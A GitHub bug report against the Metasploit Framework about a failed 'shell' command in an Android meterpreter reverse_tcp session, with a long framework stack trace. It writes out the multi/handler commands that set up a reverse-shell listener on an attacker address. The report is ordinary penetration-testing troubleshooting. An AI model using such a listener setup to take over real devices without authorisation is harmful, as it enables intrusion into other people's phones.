Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

reverse_tcp shell issue: stdapi_sys_config_getenv: Operation failed: 1 #11975

Closed
s-straub opened this issue Jun 13, 2019 · 0 comments
Closed
Labels

Comments

@s-straub
Copy link

Steps to reproduce

  1. I am using metasploit-framework 5.0.28-dev and the reverse_tcp payload
    use exploit/multi/handler
    set payload android/meterpreter/reverse_tcp
    set LHOST 10.0.0.1
    set LPORT 7080
    exploit -j -z

  2. Asap Meterpreter session has been established I execute command "shell" and get following error
    meterpreter > shell
    [-] stdapi_sys_config_getenv: Operation failed: 1

Expected behavior

Shell session should get established

Current behavior

No shell session, instead following error: stdapi_sys_config_getenv: Operation failed: 1**

Here is ~/.msf4/logs/framework.log:
/usr/bin/msfconsole:49:in <main>' [06/13/2019 12:52:54] [e(0)] core: Unable to load module /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go Errno::ENOENT No such file or directory - go /usr/lib/ruby/2.5.0/open3.rb:199:in spawn'
/usr/lib/ruby/2.5.0/open3.rb:199:in popen_run' /usr/lib/ruby/2.5.0/open3.rb:95:in popen3'
/usr/share/metasploit-framework/lib/msf/core/modules/external/bridge.rb:62:in send' /usr/share/metasploit-framework/lib/msf/core/modules/external/bridge.rb:18:in exec'
/usr/share/metasploit-framework/lib/msf/core/modules/external.rb:25:in exec' /usr/share/metasploit-framework/lib/msf/core/modules/external.rb:47:in describe'
/usr/share/metasploit-framework/lib/msf/core/modules/external.rb:13:in meta' /usr/share/metasploit-framework/lib/msf/core/modules/external/shim.rb:7:in generate'
/usr/share/metasploit-framework/lib/msf/core/modules/loader/executable.rb:88:in read_module_content' /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:127:in load_module'
/usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:246:in block in load_modules' /usr/share/metasploit-framework/lib/msf/core/modules/loader/executable.rb:53:in block (2 levels) in each_module_reference_name'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rex-core-0.1.13/lib/rex/file.rb:133:in block in find' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rex-core-0.1.13/lib/rex/file.rb:132:in catch'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rex-core-0.1.13/lib/rex/file.rb:132:in find' /usr/share/metasploit-framework/lib/msf/core/modules/loader/executable.rb:42:in block in each_module_reference_name'
/usr/share/metasploit-framework/lib/msf/core/modules/loader/executable.rb:31:in foreach' /usr/share/metasploit-framework/lib/msf/core/modules/loader/executable.rb:31:in each_module_reference_name'
/usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:245:in load_modules' /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:119:in block in load_modules'
/usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in each' /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in load_modules'
/usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:41:in block in add_module_path' /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in each'
/usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in add_module_path' /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:50:in block in init_module_paths'
/usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in each' /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in init_module_paths'
/usr/share/metasploit-framework/lib/msf/ui/console/driver.rb:161:in initialize' /usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in new'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in driver' /usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in start' /usr/bin/msfconsole:49:in

'
[06/13/2019 12:53:03] [e(0)] meterpreter: stdapi_sys_config_getenv: Operation failed: 1
[06/13/2019 12:53:03] [d(0)] meterpreter: Call stack:
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb:84:in getenvs' /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb:100:in getenv'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb:326:in cmd_shell' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:523:in run_command'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:105:in run_command' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:474:in block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in each' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in run_single'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:68:in block in interact' /usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:146:in run'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:66:in interact' /usr/share/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:575:in _interact'
/usr/share/metasploit-framework/lib/rex/ui/interactive.rb:51:in interact' /usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/core.rb:1363:in cmd_sessions'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:523:in run_command' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:474:in block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in each' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:151:in run' /usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in start' /usr/bin/msfconsole:49:in '

Metasploit version

version 5.0.28-dev

I installed Metasploit with:

  • [ X] Kali package via apt
  • [X ] Omnibus installer (nightly)

OS

Linux kali 4.19.0-kali5-amd64 #1 SMP Debian 4.19.37-2kali1 (2019-05-15) x86_64 GNU/Linux

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

No branches or pull requests

2 participants